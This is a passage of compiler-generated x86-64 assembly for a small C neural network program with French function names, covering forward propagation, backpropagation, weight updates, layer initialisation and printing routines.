callq _printf
leaq L_.str.80(%rip), %rdi
movb $0, %al
callq _printf
movq -320(%rbp), %rdi
callq _statInfosBiais
leaq L_.str.83(%rip), %rdi
movb $0, %al
callq _printf
callq _getchar
movq -320(%rbp), %rdi
callq _statInfosPoids
## %bb.13:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB30_15
## %bb.14:
addq $352, %rsp ## imm = 0x160
popq %rbp
retq
LBB30_15:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function propagation
LCPI31_0:
.quad 0x3ff0000000000000 ## double 1
.section __TEXT,__text,regular,pure_instructions
.globl _propagation
.p2align 4, 0x90
_propagation: ## @propagation
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
xorps %xmm0, %xmm0
movsd %xmm0, -24(%rbp)
xorps %xmm0, %xmm0
movsd %xmm0, -32(%rbp)
movl $0, -36(%rbp)
movq $0, -48(%rbp)
movl $0, -52(%rbp)
LBB31_1: ## =>This Inner Loop Header: Depth=1
movl -52(%rbp), %eax
movq -8(%rbp), %rcx
movq 8(%rcx), %rcx
movq (%rcx), %rcx
cmpl 16(%rcx), %eax
jge LBB31_4
## %bb.2: ## in Loop: Header=BB31_1 Depth=1
movq -16(%rbp), %rax
movslq -52(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -8(%rbp), %rax
movq 8(%rax), %rax
movq (%rax), %rax
movq (%rax), %rax
movslq -52(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.3: ## in Loop: Header=BB31_1 Depth=1
movl -52(%rbp), %eax
addl $1, %eax
movl %eax, -52(%rbp)
jmp LBB31_1
LBB31_4:
movq -8(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -48(%rbp)
movl $0, -36(%rbp)
LBB31_5: ## =>This Loop Header: Depth=1
## Child Loop BB31_7 Depth 2
## Child Loop BB31_9 Depth 3
## Child Loop BB31_16 Depth 2
movl -36(%rbp), %eax
movq -8(%rbp), %rcx
cmpl (%rcx), %eax
jge LBB31_24
## %bb.6: ## in Loop: Header=BB31_5 Depth=1
movl $0, -56(%rbp)
LBB31_7: ## Parent Loop BB31_5 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB31_9 Depth 3
movl -56(%rbp), %eax
movq -48(%rbp), %rcx
movq (%rcx), %rcx
cmpl 20(%rcx), %eax
jge LBB31_14
## %bb.8: ## in Loop: Header=BB31_7 Depth=2
movq -48(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -56(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd 8(%rax), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -24(%rbp)
movl $0, -60(%rbp)
LBB31_9: ## Parent Loop BB31_5 Depth=1
## Parent Loop BB31_7 Depth=2
## => This Inner Loop Header: Depth=3
movl -60(%rbp), %eax
movq -48(%rbp), %rcx
movq (%rcx), %rcx
cmpl 16(%rcx), %eax
jge LBB31_12
## %bb.10: ## in Loop: Header=BB31_9 Depth=3
movq -48(%rbp), %rax
movq (%rax), %rax
movq (%rax), %rax
movslq -60(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -48(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -56(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 16(%rax), %rax
movslq -60(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm2 ## xmm2 = mem[0],zero
movsd -24(%rbp), %xmm1 ## xmm1 = mem[0],zero
mulsd %xmm2, %xmm0
addsd %xmm1, %xmm0
movsd %xmm0, -24(%rbp)
## %bb.11: ## in Loop: Header=BB31_9 Depth=3
movl -60(%rbp), %eax
addl $1, %eax
movl %eax, -60(%rbp)
jmp LBB31_9
LBB31_12: ## in Loop: Header=BB31_7 Depth=2
movsd -24(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq %xmm0, %rax
movabsq $-9223372036854775808, %rcx ## imm = 0x8000000000000000
xorq %rcx, %rax
movq %rax, %xmm0
callq _exp
movsd LCPI31_0(%rip), %xmm1 ## xmm1 = mem[0],zero
addsd %xmm0, %xmm1
movsd LCPI31_0(%rip), %xmm0 ## xmm0 = mem[0],zero
divsd %xmm1, %xmm0
movsd %xmm0, -32(%rbp)
movsd -32(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -48(%rbp), %rax
movq (%rax), %rax
movq 8(%rax), %rax
movslq -56(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.13: ## in Loop: Header=BB31_7 Depth=2
movl -56(%rbp), %eax
addl $1, %eax
movl %eax, -56(%rbp)
jmp LBB31_7
LBB31_14: ## in Loop: Header=BB31_5 Depth=1
movq -48(%rbp), %rax
cmpq $0, 8(%rax)
je LBB31_20
## %bb.15: ## in Loop: Header=BB31_5 Depth=1
movl $0, -64(%rbp)
LBB31_16: ## Parent Loop BB31_5 Depth=1
## => This Inner Loop Header: Depth=2
movl -64(%rbp), %eax
movq -48(%rbp), %rcx
movq (%rcx), %rcx
cmpl 20(%rcx), %eax
jge LBB31_19
## %bb.17: ## in Loop: Header=BB31_16 Depth=2
movq -48(%rbp), %rax
movq (%rax), %rax
movq 8(%rax), %rax
movslq -64(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -48(%rbp), %rax
movq 8(%rax), %rax
movq (%rax), %rax
movq (%rax), %rax
movslq -64(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.18: ## in Loop: Header=BB31_16 Depth=2
movl -64(%rbp), %eax
addl $1, %eax
movl %eax, -64(%rbp)
jmp LBB31_16
LBB31_19: ## in Loop: Header=BB31_5 Depth=1
jmp LBB31_20
LBB31_20: ## in Loop: Header=BB31_5 Depth=1
movq -48(%rbp), %rax
cmpq $0, 8(%rax)
jne LBB31_22
## %bb.21:
jmp LBB31_24
LBB31_22: ## in Loop: Header=BB31_5 Depth=1
movq -48(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -48(%rbp)
## %bb.23: ## in Loop: Header=BB31_5 Depth=1
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB31_5
LBB31_24:
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function apprentissageNetwork
LCPI32_0:
.quad 0x3f847ae147ae147b ## double 0.01
LCPI32_1:
.quad 0x406fe00000000000 ## double 255
.section __TEXT,__text,regular,pure_instructions
.globl _apprentissageNetwork
.p2align 4, 0x90
_apprentissageNetwork: ## @apprentissageNetwork
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -16(%rbp), %rax
movq 8(%rax), %rax
movslq 24(%rax), %rdi
movl $8, %esi
callq _calloc
movq %rax, -24(%rbp)
movq -16(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -32(%rbp)
movq -8(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -40(%rbp)
LBB32_1: ## =>This Loop Header: Depth=1
## Child Loop BB32_3 Depth 2
## Child Loop BB32_7 Depth 2
## Child Loop BB32_9 Depth 3
## Child Loop BB32_11 Depth 4
cmpq $0, -32(%rbp)
je LBB32_18
## %bb.2: ## in Loop: Header=BB32_1 Depth=1
movl $0, -44(%rbp)
LBB32_3: ## Parent Loop BB32_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -44(%rbp), %eax
movq -16(%rbp), %rcx
movq 8(%rcx), %rcx
cmpl 24(%rcx), %eax
jge LBB32_6
## %bb.4: ## in Loop: Header=BB32_3 Depth=2
movq -32(%rbp), %rax
movq 16(%rax), %rax
movslq -44(%rbp), %rcx
cvtsi2sdl (%rax,%rcx,4), %xmm0
movsd LCPI32_1(%rip), %xmm1 ## xmm1 = mem[0],zero
divsd %xmm1, %xmm0
movq -24(%rbp), %rax
movslq -44(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.5: ## in Loop: Header=BB32_3 Depth=2
movl -44(%rbp), %eax
addl $1, %eax
movl %eax, -44(%rbp)
jmp LBB32_3
LBB32_6: ## in Loop: Header=BB32_1 Depth=1
movq -8(%rbp), %rdi
movq -24(%rbp), %rsi
callq _propagation
movq -8(%rbp), %rdi
movq -32(%rbp), %rsi
callq _retropropagation
movq -8(%rbp), %rdi
callq _updateDw_And_Db
movq -8(%rbp), %rdi
movsd LCPI32_0(%rip), %xmm0 ## xmm0 = mem[0],zero
callq _updateNetwork
LBB32_7: ## Parent Loop BB32_1 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB32_9 Depth 3
## Child Loop BB32_11 Depth 4
cmpq $0, -40(%rbp)
je LBB32_17
## %bb.8: ## in Loop: Header=BB32_7 Depth=2
movl $0, -48(%rbp)
LBB32_9: ## Parent Loop BB32_1 Depth=1
## Parent Loop BB32_7 Depth=2
## => This Loop Header: Depth=3
## Child Loop BB32_11 Depth 4
movl -48(%rbp), %eax
movq -40(%rbp), %rcx
movq (%rcx), %rcx
cmpl 20(%rcx), %eax
jge LBB32_16
## %bb.10: ## in Loop: Header=BB32_9 Depth=3
movq -40(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -48(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
xorps %xmm0, %xmm0
movsd %xmm0, 24(%rax)
movq -40(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -48(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
xorps %xmm0, %xmm0
movsd %xmm0, 32(%rax)
movl $0, -52(%rbp)
LBB32_11: ## Parent Loop BB32_1 Depth=1
## Parent Loop BB32_7 Depth=2
## Parent Loop BB32_9 Depth=3
## => This Inner Loop Header: Depth=4
movl -52(%rbp), %eax
movq -40(%rbp), %rcx
movq (%rcx), %rcx
movq 24(%rcx), %rcx
movslq -48(%rbp), %rdx
imulq $48, %rdx, %rdx
addq %rdx, %rcx
cmpl (%rcx), %eax
jge LBB32_14
## %bb.12: ## in Loop: Header=BB32_11 Depth=4
movq -40(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -48(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 40(%rax), %rax
movslq -52(%rbp), %rcx
xorps %xmm0, %xmm0
movsd %xmm0, (%rax,%rcx,8)
## %bb.13: ## in Loop: Header=BB32_11 Depth=4
movl -52(%rbp), %eax
addl $1, %eax
movl %eax, -52(%rbp)
jmp LBB32_11
LBB32_14: ## in Loop: Header=BB32_9 Depth=3
jmp LBB32_15
LBB32_15: ## in Loop: Header=BB32_9 Depth=3
movl -48(%rbp), %eax
addl $1, %eax
movl %eax, -48(%rbp)
jmp LBB32_9
LBB32_16: ## in Loop: Header=BB32_7 Depth=2
movq -40(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -40(%rbp)
jmp LBB32_7
LBB32_17: ## in Loop: Header=BB32_1 Depth=1
movq -32(%rbp), %rax
movq 32(%rax), %rax
movq %rax, -32(%rbp)
jmp LBB32_1
LBB32_18:
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function retropropagation
LCPI33_0:
.quad 0x3ff0000000000000 ## double 1
.section __TEXT,__text,regular,pure_instructions
.globl _retropropagation
.p2align 4, 0x90
_retropropagation: ## @retropropagation
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -8(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -24(%rbp)
movq -24(%rbp), %rax
movq (%rax), %rax
movq %rax, -32(%rbp)
movq $0, -40(%rbp)
xorps %xmm0, %xmm0
movsd %xmm0, -48(%rbp)
movl $0, -52(%rbp)
LBB33_1: ## =>This Inner Loop Header: Depth=1
movl -52(%rbp), %eax
movq -32(%rbp), %rcx
cmpl 20(%rcx), %eax
jge LBB33_4
## %bb.2: ## in Loop: Header=BB33_1 Depth=1
movq -32(%rbp), %rax
movq 8(%rax), %rax
movslq -52(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -16(%rbp), %rax
movl 12(%rax), %eax
cmpl -52(%rbp), %eax
sete %al
andb $1, %al
movzbl %al, %eax
cvtsi2sd %eax, %xmm1
subsd %xmm1, %xmm0
movq -32(%rbp), %rax
movq 8(%rax), %rax
movslq -52(%rbp), %rcx
mulsd (%rax,%rcx,8), %xmm0
movq -32(%rbp), %rax
movq 8(%rax), %rax
movslq -52(%rbp), %rcx
movsd LCPI33_0(%rip), %xmm1 ## xmm1 = mem[0],zero
subsd (%rax,%rcx,8), %xmm1
mulsd %xmm1, %xmm0
movq -32(%rbp), %rax
movq 24(%rax), %rax
movslq -52(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd %xmm0, 24(%rax)
## %bb.3: ## in Loop: Header=BB33_1 Depth=1
movl -52(%rbp), %eax
addl $1, %eax
movl %eax, -52(%rbp)
jmp LBB33_1
LBB33_4:
jmp LBB33_5
LBB33_5: ## =>This Loop Header: Depth=1
## Child Loop BB33_6 Depth 2
## Child Loop BB33_8 Depth 3
movq -24(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -24(%rbp)
movq -24(%rbp), %rax
movq (%rax), %rax
movq %rax, -32(%rbp)
movq -24(%rbp), %rax
movq 8(%rax), %rax
movq (%rax), %rax
movq %rax, -40(%rbp)
movl $0, -56(%rbp)
LBB33_6: ## Parent Loop BB33_5 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB33_8 Depth 3
movl -56(%rbp), %eax
movq -32(%rbp), %rcx
cmpl 20(%rcx), %eax
jge LBB33_13
## %bb.7: ## in Loop: Header=BB33_6 Depth=2
xorps %xmm0, %xmm0
movsd %xmm0, -48(%rbp)
movl $0, -60(%rbp)
LBB33_8: ## Parent Loop BB33_5 Depth=1
## Parent Loop BB33_6 Depth=2
## => This Inner Loop Header: Depth=3
movl -60(%rbp), %eax
movq -40(%rbp), %rcx
cmpl 20(%rcx), %eax
jge LBB33_11
## %bb.9: ## in Loop: Header=BB33_8 Depth=3
movq -40(%rbp), %rax
movq 24(%rax), %rax
movslq -60(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd 24(%rax), %xmm0 ## xmm0 = mem[0],zero
movq -40(%rbp), %rax
movq 24(%rax), %rax
movslq -60(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 16(%rax), %rax
movslq -56(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm2 ## xmm2 = mem[0],zero
movsd -48(%rbp), %xmm1 ## xmm1 = mem[0],zero
mulsd %xmm2, %xmm0
addsd %xmm1, %xmm0
movsd %xmm0, -48(%rbp)
## %bb.10: ## in Loop: Header=BB33_8 Depth=3
movl -60(%rbp), %eax
addl $1, %eax
movl %eax, -60(%rbp)
jmp LBB33_8
LBB33_11: ## in Loop: Header=BB33_6 Depth=2
movsd -48(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -32(%rbp), %rax
movq 8(%rax), %rax
movslq -56(%rbp), %rcx
mulsd (%rax,%rcx,8), %xmm0
movq -32(%rbp), %rax
movq 8(%rax), %rax
movslq -56(%rbp), %rcx
movsd LCPI33_0(%rip), %xmm1 ## xmm1 = mem[0],zero
subsd (%rax,%rcx,8), %xmm1
mulsd %xmm1, %xmm0
movq -32(%rbp), %rax
movq 24(%rax), %rax
movslq -56(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd %xmm0, 24(%rax)
## %bb.12: ## in Loop: Header=BB33_6 Depth=2
movl -56(%rbp), %eax
addl $1, %eax
movl %eax, -56(%rbp)
jmp LBB33_6
LBB33_13: ## in Loop: Header=BB33_5 Depth=1
jmp LBB33_14
LBB33_14: ## in Loop: Header=BB33_5 Depth=1
movq -24(%rbp), %rax
cmpq $0, 16(%rax)
jne LBB33_5
## %bb.15:
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _updateDw_And_Db ## -- Begin function updateDw_And_Db
.p2align 4, 0x90
_updateDw_And_Db: ## @updateDw_And_Db
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -16(%rbp)
LBB34_1: ## =>This Loop Header: Depth=1
## Child Loop BB34_3 Depth 2
## Child Loop BB34_5 Depth 3
cmpq $0, -16(%rbp)
je LBB34_11
## %bb.2: ## in Loop: Header=BB34_1 Depth=1
movl $0, -20(%rbp)
LBB34_3: ## Parent Loop BB34_1 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB34_5 Depth 3
movl -20(%rbp), %eax
movq -16(%rbp), %rcx
movq (%rcx), %rcx
cmpl 20(%rcx), %eax
jge LBB34_10
## %bb.4: ## in Loop: Header=BB34_3 Depth=2
movq -16(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -20(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd 24(%rax), %xmm0 ## xmm0 = mem[0],zero
movq -16(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -20(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
addsd 32(%rax), %xmm0
movsd %xmm0, 32(%rax)
movl $0, -24(%rbp)
LBB34_5: ## Parent Loop BB34_1 Depth=1
## Parent Loop BB34_3 Depth=2
## => This Inner Loop Header: Depth=3
movl -24(%rbp), %eax
movq -16(%rbp), %rcx
movq (%rcx), %rcx
movq 24(%rcx), %rcx
movslq -20(%rbp), %rdx
imulq $48, %rdx, %rdx
addq %rdx, %rcx
cmpl (%rcx), %eax
jge LBB34_8
## %bb.6: ## in Loop: Header=BB34_5 Depth=3
movq -16(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -20(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd 24(%rax), %xmm0 ## xmm0 = mem[0],zero
movq -16(%rbp), %rax
movq (%rax), %rax
movq (%rax), %rax
movslq -24(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm2 ## xmm2 = mem[0],zero
movq -16(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -20(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 40(%rax), %rax
movslq -24(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm1 ## xmm1 = mem[0],zero
mulsd %xmm2, %xmm0
addsd %xmm1, %xmm0
movsd %xmm0, (%rax,%rcx,8)
## %bb.7: ## in Loop: Header=BB34_5 Depth=3
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB34_5
LBB34_8: ## in Loop: Header=BB34_3 Depth=2
jmp LBB34_9
LBB34_9: ## in Loop: Header=BB34_3 Depth=2
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB34_3
LBB34_10: ## in Loop: Header=BB34_1 Depth=1
movq -16(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -16(%rbp)
jmp LBB34_1
LBB34_11:
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _updateNetwork ## -- Begin function updateNetwork
.p2align 4, 0x90
_updateNetwork: ## @updateNetwork
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movsd %xmm0, -16(%rbp)
movq -8(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -24(%rbp)
fldz
fstpt -48(%rbp)
LBB35_1: ## =>This Loop Header: Depth=1
## Child Loop BB35_3 Depth 2
## Child Loop BB35_5 Depth 3
cmpq $0, -24(%rbp)
je LBB35_11
## %bb.2: ## in Loop: Header=BB35_1 Depth=1
movl $0, -52(%rbp)
LBB35_3: ## Parent Loop BB35_1 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB35_5 Depth 3
movl -52(%rbp), %eax
movq -24(%rbp), %rcx
movq (%rcx), %rcx
cmpl 20(%rcx), %eax
jge LBB35_10
## %bb.4: ## in Loop: Header=BB35_3 Depth=2
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -24(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -52(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd 32(%rax), %xmm2 ## xmm2 = mem[0],zero
movq -24(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -52(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd 8(%rax), %xmm1 ## xmm1 = mem[0],zero
movq %xmm0, %rcx
movabsq $-9223372036854775808, %rdx ## imm = 0x8000000000000000
xorq %rdx, %rcx
movq %rcx, %xmm0
mulsd %xmm2, %xmm0
addsd %xmm1, %xmm0
movsd %xmm0, 8(%rax)
movl $0, -56(%rbp)
LBB35_5: ## Parent Loop BB35_1 Depth=1
## Parent Loop BB35_3 Depth=2
## => This Inner Loop Header: Depth=3
movl -56(%rbp), %eax
movq -24(%rbp), %rcx
movq (%rcx), %rcx
movq 24(%rcx), %rcx
movslq -52(%rbp), %rdx
imulq $48, %rdx, %rdx
addq %rdx, %rcx
cmpl (%rcx), %eax
jge LBB35_8
## %bb.6: ## in Loop: Header=BB35_5 Depth=3
fldl -16(%rbp)
movq -24(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -52(%rbp), %rcx
leaq (%rcx,%rcx,2), %rcx
shlq $4, %rcx
movq 40(%rax,%rcx), %rax
movslq -56(%rbp), %rcx
fldl (%rax,%rcx,8)
fmulp %st, %st(1)
fstpt -48(%rbp)
movq -24(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -52(%rbp), %rcx
leaq (%rcx,%rcx,2), %rcx
shlq $4, %rcx
movq 16(%rax,%rcx), %rax
movslq -56(%rbp), %rcx
fldl (%rax,%rcx,8)
fldt -48(%rbp)
fsubrp %st, %st(1)
fstpl -64(%rbp)
movsd -64(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -24(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -52(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 16(%rax), %rax
movslq -56(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.7: ## in Loop: Header=BB35_5 Depth=3
movl -56(%rbp), %eax
addl $1, %eax
movl %eax, -56(%rbp)
jmp LBB35_5
LBB35_8: ## in Loop: Header=BB35_3 Depth=2
jmp LBB35_9
LBB35_9: ## in Loop: Header=BB35_3 Depth=2
movl -52(%rbp), %eax
addl $1, %eax
movl %eax, -52(%rbp)
jmp LBB35_3
LBB35_10: ## in Loop: Header=BB35_1 Depth=1
movq -24(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -24(%rbp)
jmp LBB35_1
LBB35_11:
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _initLayers ## -- Begin function initLayers
.p2align 4, 0x90
_initLayers: ## @initLayers
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl %edi, -4(%rbp)
movl %esi, -8(%rbp)
movl $1, %edi
movl $32, %esi
callq _calloc
movq %rax, -16(%rbp)
movl -4(%rbp), %ecx
movq -16(%rbp), %rax
movl %ecx, 16(%rax)
movl -8(%rbp), %ecx
movq -16(%rbp), %rax
movl %ecx, 20(%rax)
movslq -8(%rbp), %rdi
movl $48, %esi
callq _calloc
movq %rax, %rcx
movq -16(%rbp), %rax
movq %rcx, 24(%rax)
movslq -4(%rbp), %rdi
movl $8, %esi
callq _calloc
movq %rax, %rcx
movq -16(%rbp), %rax
movq %rcx, (%rax)
movslq -8(%rbp), %rdi
movl $8, %esi
callq _calloc
movq %rax, %rcx
movq -16(%rbp), %rax
movq %rcx, 8(%rax)
movl $0, -20(%rbp)
LBB36_1: ## =>This Inner Loop Header: Depth=1
movl -20(%rbp), %eax
cmpl -8(%rbp), %eax
jge LBB36_4
## %bb.2: ## in Loop: Header=BB36_1 Depth=1
movslq -4(%rbp), %rdi
movl $8, %esi
callq _calloc
movq %rax, %rcx
movq -16(%rbp), %rax
movq 24(%rax), %rax
movslq -20(%rbp), %rdx
imulq $48, %rdx, %rdx
addq %rdx, %rax
movq %rcx, 40(%rax)
movslq -4(%rbp), %rdi
movl $8, %esi
callq _calloc
movq %rax, %rcx
movq -16(%rbp), %rax
movq 24(%rax), %rax
movslq -20(%rbp), %rdx
imulq $48, %rdx, %rdx
addq %rdx, %rax
movq %rcx, 16(%rax)
movl -4(%rbp), %ecx
movq -16(%rbp), %rax
movq 24(%rax), %rax
movslq -20(%rbp), %rdx
imulq $48, %rdx, %rdx
addq %rdx, %rax
movl %ecx, (%rax)
## %bb.3: ## in Loop: Header=BB36_1 Depth=1
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB36_1
LBB36_4:
movq -16(%rbp), %rax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _printNetwork ## -- Begin function printNetwork
.p2align 4, 0x90
_printNetwork: ## @printNetwork
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rdi
callq _estVideNetwork
cmpl $0, %eax
je LBB37_2
## %bb.1:
leaq L_.str.84(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB37_6
LBB37_2:
movq -8(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -16(%rbp)
LBB37_3: ## =>This Inner Loop Header: Depth=1
cmpq $0, -16(%rbp)
je LBB37_5
## %bb.4: ## in Loop: Header=BB37_3 Depth=1
movq -16(%rbp), %rax
movq (%rax), %rdi
callq _printLayers
movq -16(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -16(%rbp)
jmp LBB37_3
LBB37_5:
leaq L_.str.45(%rip), %rdi
movb $0, %al
callq _printf
LBB37_6:
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _printLayers ## -- Begin function printLayers
.p2align 4, 0x90
_printLayers: ## @printLayers
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
movl $0, -12(%rbp)
leaq L_.str.87(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -12(%rbp)
LBB38_1: ## =>This Inner Loop Header: Depth=1
movl -12(%rbp), %eax
movq -8(%rbp), %rcx
cmpl 16(%rcx), %eax
jge LBB38_4
## %bb.2: ## in Loop: Header=BB38_1 Depth=1
movq -8(%rbp), %rax
movq (%rax), %rax
movslq -12(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.88(%rip), %rdi
movb $1, %al
callq _printf
## %bb.3: ## in Loop: Header=BB38_1 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB38_1
LBB38_4:
leaq L_.str.45(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -12(%rbp)
LBB38_5: ## =>This Inner Loop Header: Depth=1
movl -12(%rbp), %eax
movq -8(%rbp), %rcx
cmpl 20(%rcx), %eax
jge LBB38_8
## %bb.6: ## in Loop: Header=BB38_5 Depth=1
movl -12(%rbp), %esi
leaq L_.str.89(%rip), %rdi
movb $0, %al
callq _printf
movq -8(%rbp), %rax
movq 24(%rax), %rdi
movslq -12(%rbp), %rax
imulq $48, %rax, %rax
addq %rax, %rdi
callq _printNeurone
## %bb.7: ## in Loop: Header=BB38_5 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB38_5
LBB38_8:
leaq L_.str.45(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.90(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -12(%rbp)
LBB38_9: ## =>This Inner Loop Header: Depth=1
movl -12(%rbp), %eax
movq -8(%rbp), %rcx
cmpl 20(%rcx), %eax
jge LBB38_12
## %bb.10: ## in Loop: Header=BB38_9 Depth=1
movq -8(%rbp), %rax
movq 8(%rax), %rax
movslq -12(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.88(%rip), %rdi
movb $1, %al
callq _printf
## %bb.11: ## in Loop: Header=BB38_9 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
